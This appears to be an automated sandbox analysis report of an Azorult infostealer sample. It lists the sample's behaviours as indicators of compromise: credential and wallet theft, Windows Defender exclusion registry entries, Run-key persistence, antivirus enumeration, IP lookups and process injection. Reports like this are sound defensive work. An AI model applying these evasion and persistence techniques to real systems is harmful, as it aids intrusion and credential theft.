azorult | fd629388528491dab90afa484934c52d867fdb15651619569554418dca7096d6

System Information Discovery

Processes:

setup.exesetup.exe

description	ioc	process
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion	setup.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion	setup.exe

Checks computer location settings 2 TTPs 4 IoCs

Looks up country code configured in the registry, likely geofence.

Query Registry

System Information Discovery

Processes:

setups.tmp1rexm2eyd4t.tmpsetups.tmpcmd.exe

description	ioc	process
Key value queried	\REGISTRY\USER\S-1-5-21-3341490333-719741536-2920803124-1000\Control Panel\International\Geo\Nation	setups.tmp
Key value queried	\REGISTRY\USER\S-1-5-21-3341490333-719741536-2920803124-1000\Control Panel\International\Geo\Nation	1rexm2eyd4t.tmp
Key value queried	\REGISTRY\USER\S-1-5-21-3341490333-719741536-2920803124-1000\Control Panel\International\Geo\Nation	setups.tmp
Key value queried	\REGISTRY\USER\S-1-5-21-3341490333-719741536-2920803124-1000\Control Panel\International\Geo\Nation	cmd.exe

Loads dropped DLL 64 IoCs

Processes:

vict.tmpSetup3310.tmponaqkq5mwmg.tmpvpn.tmpIBInstaller_97039.tmp1rexm2eyd4t.tmpSetup.tmpapp.exeCF6C.tmp.exeDelta.tmpPictureLAb.tmpSetup.tmpSetup.exemain.exeprivacytools5.exesetups.tmpsetup.exemask_svc.exevict.tmpSetup3310.tmpSetup.tmpapp.exeDelta.tmpPictureLAb.tmppatch.exeSetup.exe

pid	process
4436	vict.tmp
4524	Setup3310.tmp
4524	Setup3310.tmp
4544	onaqkq5mwmg.tmp
4576	vpn.tmp
4576	vpn.tmp
4576	vpn.tmp
4576	vpn.tmp
4576	vpn.tmp
4576	vpn.tmp
4576	vpn.tmp
4576	vpn.tmp
4904	IBInstaller_97039.tmp
4668	1rexm2eyd4t.tmp
4668	1rexm2eyd4t.tmp
4668	1rexm2eyd4t.tmp
4668	1rexm2eyd4t.tmp
4668	1rexm2eyd4t.tmp
4844	Setup.tmp
4844	Setup.tmp
4924	app.exe
1540	CF6C.tmp.exe
1540	CF6C.tmp.exe
1540	CF6C.tmp.exe
1540	CF6C.tmp.exe
1540	CF6C.tmp.exe
1540	CF6C.tmp.exe
5508	Delta.tmp
5508	Delta.tmp
4388	PictureLAb.tmp
4388	PictureLAb.tmp
4920	Setup.tmp
836	Setup.exe
836	Setup.exe
6472	main.exe
7404	privacytools5.exe
7040	setups.tmp
7040	setups.tmp
7040	setups.tmp
7040	setups.tmp
7040	setups.tmp
5636	setup.exe
7228	mask_svc.exe
7228	mask_svc.exe
7228	mask_svc.exe
7228	mask_svc.exe
7228	mask_svc.exe
7228	mask_svc.exe
7136	vict.tmp
5704	Setup3310.tmp
5704	Setup3310.tmp
4576	vpn.tmp
4576	vpn.tmp
6844	Setup.tmp
6844	Setup.tmp
5520	app.exe
6848	Delta.tmp
6848	Delta.tmp
3344	PictureLAb.tmp
3344	PictureLAb.tmp
6076	patch.exe
6076	patch.exe
6076	patch.exe
8144	Setup.exe

Reads data files stored by FTP clients 2 TTPs
Tries to access configuration files associated with programs like FileZilla.
spyware stealer

Data from Local System
T1005

Credentials in Files
T1081
Reads local data of messenger clients 2 TTPs
Infostealers often target stored data of messaging applications, which can include saved credentials and account information.
spyware stealer

Data from Local System
T1005

Credentials in Files
T1081
Reads user/profile data of local email clients 2 TTPs
Email clients store some user data on disk where infostealers will often target it.
spyware stealer

Data from Local System
T1005

Credentials in Files
T1081
Reads user/profile data of web browsers 2 TTPs
Infostealers often target stored browser data, which can include saved credentials etc.
spyware stealer

Data from Local System
T1005

Credentials in Files
T1081

Windows security modification 2 TTPs 10 IoCs

evasion trojan

Disabling Security Tools

T1089

Modify Registry

Processes:

app.exe

description	ioc	process
Set value (int)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths\C:\Windows\rss = "0"	app.exe
Set value (int)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths\C:\Users\Admin\AppData\Roaming\RestlessWater = "0"	app.exe
Set value (int)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows Defender\Exclusions\Processes\csrss.exe = "0"	app.exe
Set value (int)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows Defender\Exclusions\Processes\app.exe = "0"	app.exe
Set value (int)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths\C:\Windows = "0"	app.exe
Set value (int)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths\C:\Users\Admin\AppData\Local\Temp\csrss = "0"	app.exe
Set value (int)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths\C:\Windows\windefender.exe = "0"	app.exe
Set value (int)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths\C:\Users\Admin\AppData\Local\Temp\wup = "0"	app.exe
Set value (int)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths\C:\Windows\System32\drivers = "0"	app.exe
Set value (int)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows Defender\Exclusions\Processes\windefender.exe = "0"	app.exe

Accesses 2FA software files, possible credential harvesting 2 TTPs
spyware stealer

Data from Local System
T1005

Credentials in Files
T1081
Accesses cryptocurrency files/wallets, possible credential harvesting 2 TTPs
spyware

Data from Local System
T1005

Credentials in Files
T1081

Adds Run key to start application 2 TTPs 11 IoCs

persistence

Registry Run Keys / Startup Folder

T1060

Modify Registry

Processes:

1rexm2eyd4t.tmp9OZ13L0AA.exetimeout.exe2311699.25Conhost.execmd.exehjjgaa.exeapp.exereg.exemultitimer.exe

description	ioc	process
Set value (str)	\REGISTRY\USER\S-1-5-21-3341490333-719741536-2920803124-1000\Software\Microsoft\Windows\CurrentVersion\Run\7079448 = "\"C:\\Users\\Admin\\AppData\\Roaming\\eyk0e3kpjuc\\1rexm2eyd4t.exe\" /VERYSILENT"	1rexm2eyd4t.tmp
Set value (str)	\REGISTRY\USER\S-1-5-21-3341490333-719741536-2920803124-1000\Software\Microsoft\Windows\CurrentVersion\Run\BO1M4MJ6D3I4RU0 = "\"C:\\Program Files\\9OZ13L0AAW\\9OZ13L0AA.exe\""	9OZ13L0AA.exe
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\RunOnce\system recover = "\"C:\\Program Files (x86)\\Windows Photo Viewer\\Tewytileli.exe\""	timeout.exe
Set value (str)	\REGISTRY\USER\S-1-5-21-3341490333-719741536-2920803124-1000\Software\Microsoft\Windows\CurrentVersion\Run\Windows Host = "C:\\ProgramData\\Windows Host\\Windows Host.exe"	2311699.25
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\RunOnce\2mqfxadrzns = "\"C:\\Users\\Admin\\AppData\\Local\\Temp\\RBB0U1V76O\\multitimer.exe\" 1 3.1616095912.6053aaa8c5a39"	Conhost.exe
Key created	\REGISTRY\USER\S-1-5-21-3341490333-719741536-2920803124-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Run	cmd.exe
Set value (str)	\REGISTRY\USER\S-1-5-21-3341490333-719741536-2920803124-1000\Software\Microsoft\Windows\CurrentVersion\Run\wwwupdat3 = "C:\\Users\\Admin\\AppData\\Roaming\\wwwupdat3.exe"	cmd.exe
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Windows\CurrentVersion\Run\haleng = "C:\\Users\\Admin\\AppData\\Local\\Temp\\haleng.exe"	hjjgaa.exe
Set value (str)	\REGISTRY\USER\S-1-5-21-3341490333-719741536-2920803124-1000\Software\Microsoft\Windows\CurrentVersion\Run\RestlessWater = "\"C:\\Windows\\rss\\csrss.exe\""	app.exe
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\RunOnce\d2mwrhnkl3y = "\"C:\\Users\\Admin\\AppData\\Local\\Temp\\VFHCJZLXJ8\\multitimer.exe\" 1 3.1616096033.6053ab211c493"	reg.exe
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\RunOnce\yusotwuvsjc = "\"C:\\Users\\Admin\\AppData\\Local\\Temp\\RNKNRH41AY\\multitimer.exe\" 1 3.1616095784.6053aa2870069"	multitimer.exe

Checks for any installed AV software in registry 1 TTPs 64 IoCs

Security Software Discovery

T1063

Processes:

multitimer.exemultitimer.exemultitimer.exe

description	ioc	process
Key opened	\REGISTRY\MACHINE\SOFTWARE\COMODO\CIS	multitimer.exe
Key opened	\REGISTRY\MACHINE\SOFTWARE\COMODO\CIS	multitimer.exe
Key opened	\REGISTRY\USER\S-1-5-21-3341490333-719741536-2920803124-1000\Software\ArcaBit	multitimer.exe
Key opened	\REGISTRY\USER\S-1-5-21-3341490333-719741536-2920803124-1000\Software\Vba32\Loader	multitimer.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\services\a2AntiMalware	multitimer.exe
Key opened	\REGISTRY\USER\S-1-5-21-3341490333-719741536-2920803124-1000\Software\Sophos	multitimer.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\services\a2AntiMalware	multitimer.exe
Key opened	\REGISTRY\USER\S-1-5-21-3341490333-719741536-2920803124-1000\Software\BullGuard Ltd.\BullGuard\Main	multitimer.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Services\McAPExe	multitimer.exe
Key opened	\REGISTRY\MACHINE\SOFTWARE\Wow6432Node\ESET\NOD	multitimer.exe
Key opened	\REGISTRY\USER\S-1-5-21-3341490333-719741536-2920803124-1000\SOFTWARE\ClamWin\Version	multitimer.exe
Key opened	\REGISTRY\USER\S-1-5-21-3341490333-719741536-2920803124-1000\Software\G Data\AntiVirenKit	multitimer.exe
Key opened	\REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Doctor Web\InstalledComponents	multitimer.exe
Key opened	\REGISTRY\USER\S-1-5-21-3341490333-719741536-2920803124-1000\Software\G Data\AntiVirenKit	multitimer.exe
Key opened	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Microsoft Antimalware Setup\StartMenu Microsoft Security Essentials	multitimer.exe
Key opened	\REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Microsoft Antimalware Setup\StartMenu Microsoft Security Essentials	multitimer.exe
Key opened	\REGISTRY\MACHINE\Software\Avira\Antivirus	multitimer.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\services\a2AntiMalware	multitimer.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Services\AntiVirService	multitimer.exe
Key opened	\REGISTRY\MACHINE\SOFTWARE\ESET\NOD	multitimer.exe
Key opened	\REGISTRY\USER\S-1-5-21-3341490333-719741536-2920803124-1000\Software\IKARUS\anti.virus	multitimer.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Services\QHActiveDefense	multitimer.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Services\McProxy	multitimer.exe
Key opened	\REGISTRY\USER\S-1-5-21-3341490333-719741536-2920803124-1000\Software\Fortinet\FortiClient\installed	multitimer.exe
Key opened	\REGISTRY\USER\S-1-5-21-3341490333-719741536-2920803124-1000\Software\K7 Computing\K7TotalSecurity	multitimer.exe
Key opened	\REGISTRY\USER\S-1-5-21-3341490333-719741536-2920803124-1000\Software\ArcaBit	multitimer.exe
Key opened	\REGISTRY\MACHINE\SOFTWARE\ClamWin\Version	multitimer.exe
Key opened	\REGISTRY\MACHINE\SOFTWARE\Wow6432Node\ClamWin\Version	multitimer.exe
Key opened	\REGISTRY\MACHINE\SOFTWARE\AVAST Software\Avast	multitimer.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Services\BavSvc	multitimer.exe
Key opened	\REGISTRY\MACHINE\SOFTWARE\F-Secure\Computer Security\DART	multitimer.exe
Key opened	\REGISTRY\USER\S-1-5-21-3341490333-719741536-2920803124-1000\SOFTWARE\ClamWin\Version	multitimer.exe
Key opened	\REGISTRY\USER\S-1-5-21-3341490333-719741536-2920803124-1000\Software\Fortinet\FortiClient\installed	multitimer.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Services\AVP18.0.0	multitimer.exe
Key opened	\REGISTRY\MACHINE\SOFTWARE\Wow6432Node\AVAST Software\Avast	multitimer.exe
Key opened	\REGISTRY\USER\S-1-5-21-3341490333-719741536-2920803124-1000\SOFTWARE\F-Secure\Computer Security\DART	multitimer.exe
Key opened	\REGISTRY\MACHINE\SOFTWARE\AVAST Software\Avast	multitimer.exe
Key opened	\REGISTRY\MACHINE\SOFTWARE\Wow6432Node\COMODO\CIS	multitimer.exe
Key opened	\REGISTRY\USER\S-1-5-21-3341490333-719741536-2920803124-1000\Software\Bitdefender\QuickScan	multitimer.exe
Key opened	\REGISTRY\USER\S-1-5-21-3341490333-719741536-2920803124-1000\Software\Sophos	multitimer.exe
Key opened	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Microsoft Antimalware Setup\StartMenu Microsoft Security Essentials	multitimer.exe
Key opened	\REGISTRY\USER\S-1-5-21-3341490333-719741536-2920803124-1000\Software\TrendMicro\UniClient	multitimer.exe
Key opened	\REGISTRY\MACHINE\SOFTWARE\ClamWin\Version	multitimer.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Services\AntiVirService	multitimer.exe
Key opened	\REGISTRY\USER\S-1-5-21-3341490333-719741536-2920803124-1000\Software\Avira\Antivirus	multitimer.exe
Key opened	\REGISTRY\USER\S-1-5-21-3341490333-719741536-2920803124-1000\SOFTWARE\AVG\AV	multitimer.exe
Key opened	\REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Microsoft Antimalware Setup\StartMenu Microsoft Security Essentials	multitimer.exe
Key opened	\REGISTRY\USER\S-1-5-21-3341490333-719741536-2920803124-1000\SOFTWARE\AhnLab\V3IS80	multitimer.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Services\DrWebAVService	multitimer.exe
Key opened	\REGISTRY\MACHINE\SOFTWARE\Doctor Web\InstalledComponents	multitimer.exe
Key opened	\REGISTRY\USER\S-1-5-21-3341490333-719741536-2920803124-1000\Software\Vba32\Loader	multitimer.exe
Key opened	\REGISTRY\USER\S-1-5-21-3341490333-719741536-2920803124-1000\Software\K7 Computing\K7TotalSecurity	multitimer.exe
Key opened	\REGISTRY\USER\S-1-5-21-3341490333-719741536-2920803124-1000\SOFTWARE\ClamWin\Version	multitimer.exe
Key opened	\REGISTRY\MACHINE\SOFTWARE\Wow6432Node\AhnLab\V3IS80	multitimer.exe
Key opened	\REGISTRY\MACHINE\SOFTWARE\Wow6432Node\AVAST Software\Avast	multitimer.exe
Key opened	\REGISTRY\MACHINE\SOFTWARE\AVG\AV	multitimer.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Services\McProxy	multitimer.exe
Key opened	\REGISTRY\USER\S-1-5-21-3341490333-719741536-2920803124-1000\SOFTWARE\COMODO\CIS	multitimer.exe
Key opened	\REGISTRY\USER\S-1-5-21-3341490333-719741536-2920803124-1000\Software\Jiangmin\ComputerID	multitimer.exe
Key opened	\REGISTRY\MACHINE\SOFTWARE\Doctor Web\InstalledComponents	multitimer.exe
Key opened	\REGISTRY\USER\S-1-5-21-3341490333-719741536-2920803124-1000\Software\McAfee\DesktopProtection	multitimer.exe
Key opened	\REGISTRY\MACHINE\SOFTWARE\Wow6432Node\ESET\NOD	multitimer.exe
Key opened	\REGISTRY\USER\S-1-5-21-3341490333-719741536-2920803124-1000\Software\IKARUS\anti.virus	multitimer.exe
Key opened	\REGISTRY\MACHINE\SOFTWARE\F-Secure\Computer Security\DART	multitimer.exe

Checks installed software on the system 1 TTPs
Looks up Uninstall key entries in the registry to enumerate software on the system.
discovery

Query Registry
T1012

Checks whether UAC is enabled 1 TTPs 2 IoCs

evasion trojan

System Information Discovery

Processes:

md2_2efs.exemd7_7dfj.exe

description	ioc	process
Key value queried	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA	md2_2efs.exe
Key value queried	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA	md7_7dfj.exe

Legitimate hosting services abused for malware hosting/C2 1 TTPs

Web Service
T1102

Looks up external IP address via web service 17 IoCs

Uses a legitimate IP lookup service to find the infected system's external IP.

Processes:

flow	ioc
54	api.ipify.org
208	ip-api.com
453	ipinfo.io
649	checkip.amazonaws.com
182	ipinfo.io
325	checkip.amazonaws.com
440	ipinfo.io
679	ipinfo.io
96	ipinfo.io
174	ipinfo.io
682	ipinfo.io
101	ipinfo.io
155	checkip.amazonaws.com
166	api.ipify.org
358	ipinfo.io
362	ipinfo.io
523	ip-api.com

Maps connected drives based on registry 3 TTPs 6 IoCs

Disk information is often read in order to detect sandboxing environments.

Query Registry

Peripheral Device Discovery

T1120

System Information Discovery

Processes:

multitimer.exemultitimer.exemultitimer.exe

description	ioc	process
Key value queried	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Services\Disk\Enum\0	multitimer.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\services\Disk\Enum	multitimer.exe
Key value queried	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Services\Disk\Enum\0	multitimer.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\services\Disk\Enum	multitimer.exe
Key value queried	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Services\Disk\Enum\0	multitimer.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\services\Disk\Enum	multitimer.exe

Drops file in System32 directory 24 IoCs

Processes:

powershell.exeLSujfCV.exeDrvInst.exeDrvInst.exesetup.exetapinstall.exepowershell.exesetup.exe

description	ioc	process
File opened for modification	C:\Windows\SysWOW64\config\systemprofile\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive	powershell.exe
File created	C:\Windows\system32\GroupPolicy\Machine\Registry.pol	LSujfCV.exe
File opened for modification	C:\Windows\System32\DriverStore\Temp\{2a5f5157-d934-024c-8388-94598b156c29}\SET4AF.tmp	DrvInst.exe
File created	C:\Windows\System32\DriverStore\Temp\{2a5f5157-d934-024c-8388-94598b156c29}\SET4AF.tmp	DrvInst.exe
File opened for modification	C:\Windows\System32\DriverStore\Temp\{2a5f5157-d934-024c-8388-94598b156c29}\SET4B0.tmp	DrvInst.exe
File opened for modification	C:\Windows\System32\DriverStore\FileRepository\oemvista.inf_amd64_a572b7f20c402d28\tap0901.sys	DrvInst.exe
File created	C:\Windows\System32\DriverStore\FileRepository\oemvista.inf_amd64_a572b7f20c402d28\oemvista.PNF	DrvInst.exe
File created	C:\Windows\system32\GroupPolicy\gpt.ini	setup.exe
File opened for modification	C:\Windows\System32\DriverStore\Temp\{2a5f5157-d934-024c-8388-94598b156c29}\SET4C1.tmp	DrvInst.exe
File opened for modification	C:\Windows\System32\DriverStore\FileRepository\oemvista.inf_amd64_a572b7f20c402d28\oemvista.inf	DrvInst.exe
File opened for modification	C:\Windows\System32\DriverStore\Temp\{2a5f5157-d934-024c-8388-94598b156c29}	DrvInst.exe
File created	C:\Windows\System32\DriverStore\FileRepository\oemvista.inf_amd64_a572b7f20c402d28\oemvista.PNF	tapinstall.exe
File created	C:\Windows\SysWOW64\config\systemprofile\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive	powershell.exe
File opened for modification	C:\Windows\system32\GroupPolicy\gpt.ini	LSujfCV.exe
File opened for modification	C:\Windows\System32\DriverStore\Temp\{2a5f5157-d934-024c-8388-94598b156c29}\oemvista.inf	DrvInst.exe
File opened for modification	C:\Windows\System32\DriverStore\Temp\{2a5f5157-d934-024c-8388-94598b156c29}\tap0901.cat	DrvInst.exe
File created	C:\Windows\System32\DriverStore\Temp\{2a5f5157-d934-024c-8388-94598b156c29}\SET4C1.tmp	DrvInst.exe
File opened for modification	C:\Windows\System32\CatRoot2\dberr.txt	DrvInst.exe
File opened for modification	C:\Windows\system32\GroupPolicy\gpt.ini	setup.exe
File created	C:\Windows\SysWOW64\config\systemprofile\AppData\Local\Microsoft\CLR_v4.0_32\UsageLogs\powershell.exe.log	powershell.exe
File created	C:\Windows\System32\DriverStore\Temp\{2a5f5157-d934-024c-8388-94598b156c29}\SET4B0.tmp	DrvInst.exe
File opened for modification	C:\Windows\System32\DriverStore\Temp\{2a5f5157-d934-024c-8388-94598b156c29}\tap0901.sys	DrvInst.exe
File created	C:\Windows\System32\DriverStore\drvstore.tmp	DrvInst.exe
File opened for modification	C:\Windows\System32\DriverStore\FileRepository\oemvista.inf_amd64_a572b7f20c402d28\tap0901.cat	DrvInst.exe

Suspicious use of NtSetInformationThreadHideFromDebugger 12 IoCs

Processes:

mask_svc.exeparse.exeConhost.exeparse.exemask_svc.exemask_svc.exe

pid	process
4804	mask_svc.exe
7612	parse.exe
6456	Conhost.exe
1292	parse.exe
7612	parse.exe
6456	Conhost.exe
1292	parse.exe
5900	mask_svc.exe
7612	parse.exe
6456	Conhost.exe
1292	parse.exe
7228	mask_svc.exe

Suspicious use of SetThreadContext 8 IoCs

Processes:

key.exeCDB6.tmp.execmd.exeXagdaNLKU.exeGDZ4y6rzJ.exeprivacytools5.exeprivacytools5.exeED72.tmp.exe

description	pid	process	target process
PID 3136 set thread context of 3996	3136	key.exe	key.exe
PID 1636 set thread context of 3916	1636	CDB6.tmp.exe	CDB6.tmp.exe
PID 888 set thread context of 5096	888	cmd.exe	8590c1ec..exe
PID 5628 set thread context of 5856	5628	XagdaNLKU.exe	XagdaNLKU.exe
PID 5896 set thread context of 5128	5896	GDZ4y6rzJ.exe	GDZ4y6rzJ.exe
PID 7672 set thread context of 7404	7672	privacytools5.exe	privacytools5.exe
PID 6988 set thread context of 1420	6988	privacytools5.exe	privacytools5.exe
PID 6884 set thread context of 2108	6884	ED72.tmp.exe	AddInProcess32.exe

Drops file in Program Files directory 64 IoCs

Processes:

7za.exeapp.exevpn.tmpprolab.tmponaqkq5mwmg.tmpIBInstaller_97039.tmp7za.exesetup.exeiohfq4l4pj4.exeapp.exetimeout.exesetup.exeDllHost.exe7za.exesetup.exe7za.exevict.tmp7za.exesetup.exe7za.exeMaskVPNUpdate.exe

description	ioc	process
File opened for modification	C:\Program Files (x86)\Delicate-Fire\WinmonProcessMonitor.sys	7za.exe
File opened for modification	C:\Program Files (x86)\Delicate-Fire\winamp-plugins.7z	app.exe
File opened for modification	C:\Program Files (x86)\MaskVPN\driver\winxp64\devcon.exe	vpn.tmp
File created	C:\Program Files (x86)\Picture Lab\is-IFPE8.tmp	prolab.tmp
File created	C:\Program Files (x86)\Picture Lab\is-JQ1I5.tmp	prolab.tmp
File created	C:\Program Files (x86)\viewerise\unins000.dat	onaqkq5mwmg.tmp
File created	C:\Program Files (x86)\IBBrowserInstallerEngine\is-DHT4N.tmp	IBInstaller_97039.tmp
File created	C:\Program Files (x86)\Picture Lab\unins000.dat	prolab.tmp
File created	C:\Program Files (x86)\Fragrant-Forest\winamp.exe	7za.exe
File created	C:\Program Files (x86)\Fragrant-Forest\NalDrv.sys	setup.exe
File created	C:\Program Files (x86)\Delicate-Fire\7za.exe	app.exe
File created	C:\Program Files (x86)\MaskVPN\unins000.dat	vpn.tmp
File created	C:\Program Files\9OZ13L0AAW\uninstaller.exe.config	iohfq4l4pj4.exe
File created	C:\Program Files (x86)\MaskVPN\driver\win764\is-NAL7C.tmp	vpn.tmp
File created	C:\Program Files\9OZ13L0AAW\9OZ13L0AA.exe.config	iohfq4l4pj4.exe
File created	C:\Program Files (x86)\Still-Rain\7za.exe	app.exe
File created	C:\Program Files (x86)\Windows Photo Viewer\Tewytileli.exe	timeout.exe
File opened for modification	C:\Program Files (x86)\MaskVPN\mask_svc.exe	vpn.tmp
File opened for modification	C:\Program Files (x86)\MaskVPN\polstore.dll	vpn.tmp
File opened for modification	C:\Program Files (x86)\White-Pond\winamp-plugins.7z	setup.exe
File created	C:\Program Files (x86)\Delicate-Fire\7zxa.dll	app.exe
File created	C:\Program Files (x86)\Delicate-Fire\winamp.7z	app.exe
File created	C:\Program Files (x86)\IBBrowserInstallerEngine\unins000.dat	IBInstaller_97039.tmp
File opened for modification	C:\Program Files (x86)\Picture Lab\WeifenLuo.WinFormsUI.dll	prolab.tmp
File created	C:\Program Files (x86)\MaskVPN\driver\winxp64\is-6LODV.tmp	vpn.tmp
File created	C:\Program Files (x86)\Picture Lab\is-TDPJH.tmp	prolab.tmp
File created	C:\Program Files (x86)\Delicate-Fire\NalDrv.sys	DllHost.exe
File created	C:\Program Files (x86)\MaskVPN\is-31DES.tmp	vpn.tmp
File created	C:\Program Files (x86)\MaskVPN\driver\winxp32\is-U5MFS.tmp	vpn.tmp
File created	C:\Program Files (x86)\MaskVPN\driver\winxp32\is-TUCUH.tmp	vpn.tmp
File created	C:\Program Files (x86)\MaskVPN\driver\winxp64\is-7BN6S.tmp	vpn.tmp
File created	C:\Program Files (x86)\IBBrowserInstallerEngine\is-CDIUN.tmp	IBInstaller_97039.tmp
File opened for modification	C:\Program Files (x86)\Picture Lab\AForge.Math.dll	prolab.tmp
File opened for modification	C:\Program Files (x86)\Picture Lab\Pictures Lab.exe	prolab.tmp
File opened for modification	C:\Program Files (x86)\Picture Lab\unins000.dat	prolab.tmp
File opened for modification	C:\Program Files (x86)\MaskVPN\driver\win732\tapinstall.exe	vpn.tmp
File created	C:\Program Files (x86)\MaskVPN\driver\win764\is-867I8.tmp	vpn.tmp
File created	C:\Program Files (x86)\Fragrant-Forest\winamp.exe	7za.exe
File opened for modification	C:\Program Files (x86)\Delicate-Fire\help.txt	app.exe
File created	C:\Program Files (x86)\White-Pond\winamp.7z	setup.exe
File created	C:\Program Files (x86)\Fragrant-Forest\help.txt	setup.exe
File created	C:\Program Files (x86)\Fragrant-Forest\WinmonProcessMonitor.sys	7za.exe
File created	C:\Program Files (x86)\Still-Rain\winamp.exe	7za.exe
File opened for modification	C:\Program Files (x86)\viewerise\unins000.dat	vict.tmp
File created	C:\Program Files (x86)\MaskVPN\driver\win764\is-F1IVL.tmp	vpn.tmp
File opened for modification	C:\Program Files (x86)\IBBrowserInstallerEngine\Borland.Delphi.dll	IBInstaller_97039.tmp
File opened for modification	C:\Program Files (x86)\Fragrant-Forest\WinmonProcessMonitor.sys	7za.exe
File opened for modification	C:\Program Files (x86)\Delicate-Fire\winamp.exe	7za.exe
File created	C:\Program Files (x86)\White-Pond\NalDrv.sys	setup.exe
File created	C:\Program Files (x86)\MaskVPN\is-224KG.tmp	vpn.tmp
File opened for modification	C:\Program Files (x86)\IBBrowserInstallerEngine\ServiceModelInstallRC.dll	IBInstaller_97039.tmp
File opened for modification	C:\Program Files (x86)\IBBrowserInstallerEngine\Borland.Studio.Delphi.dll	IBInstaller_97039.tmp
File opened for modification	C:\Program Files (x86)\IBBrowserInstallerEngine\Borland.Studio.Host.dll	IBInstaller_97039.tmp
File created	C:\Program Files (x86)\IBBrowserInstallerEngine\is-2DC8L.tmp	IBInstaller_97039.tmp
File created	C:\Program Files\Common Files\WVWSNLBSQQ\prolab.exe	timeout.exe
File created	C:\Program Files (x86)\Delicate-Fire\WinmonProcessMonitor.sys	7za.exe
File opened for modification	C:\Program Files (x86)\MaskVPN\MaskVPNUpdate.exe	vpn.tmp
File created	C:\Program Files (x86)\MaskVPN\driver\winxp32\is-R8TD1.tmp	vpn.tmp
File opened for modification	C:\Program Files (x86)\Still-Rain\WinmonProcessMonitor.sys	7za.exe
File created	C:\Program Files (x86)\Picture Lab\is-JGS79.tmp	prolab.tmp
File opened for modification	C:\Program Files (x86)\Delicate-Fire\winamp.exe	7za.exe
File opened for modification	C:\Program Files (x86)\MaskVPN\version	MaskVPNUpdate.exe
File opened for modification	C:\Program Files (x86)\MaskVPN\libeay32.dll	vpn.tmp
File created	C:\Program Files (x86)\MaskVPN\is-FDE04.tmp	vpn.tmp

Drops file in Windows directory 24 IoCs

Processes:

svchost.exeDrvInst.execsrss.exeschtasks.exetapinstall.exeDrvInst.exeConhost.exemultitimer.exemultitimer.exereg.exeapp.exeMicrosoftEdge.exeWerFault.exeschtasks.exeMicrosoftEdge.exeMicrosoftEdge.exe

description	ioc	process
File opened for modification	C:\Windows\INF\setupapi.dev.log	svchost.exe
File created	C:\Windows\INF\oem2.PNF	DrvInst.exe
File created	C:\Windows\windefender.exe	csrss.exe
File opened for modification	C:\Windows\Tasks\byGaxHSkIutywxzLoY.job	schtasks.exe
File opened for modification	C:\Windows\INF\setupapi.dev.log	tapinstall.exe
File opened for modification	C:\Windows\INF\setupapi.dev.log	DrvInst.exe
File created	C:\Windows\inf\oem2.inf	DrvInst.exe
File created	C:\Windows\Microsoft.NET\Framework64\v2.0.50727\config\security.config.cch.new	Conhost.exe
File created	C:\Windows\Microsoft.NET\Framework64\v2.0.50727\config\enterprisesec.config.cch.new	multitimer.exe
File created	C:\Windows\Microsoft.NET\Framework64\v2.0.50727\config\security.config.cch.new	multitimer.exe
File created	C:\Windows\Microsoft.NET\Framework64\v2.0.50727\config\enterprisesec.config.cch.new	multitimer.exe
File opened for modification	C:\Windows\Debug\ESE.TXT	reg.exe
File opened for modification	C:\Windows\rss	app.exe
File created	C:\Windows\rss\csrss.exe	app.exe
File opened for modification	C:\Windows\windefender.exe	csrss.exe
File created	C:\Windows\Microsoft.NET\Framework64\v2.0.50727\config\security.config.cch.new	multitimer.exe
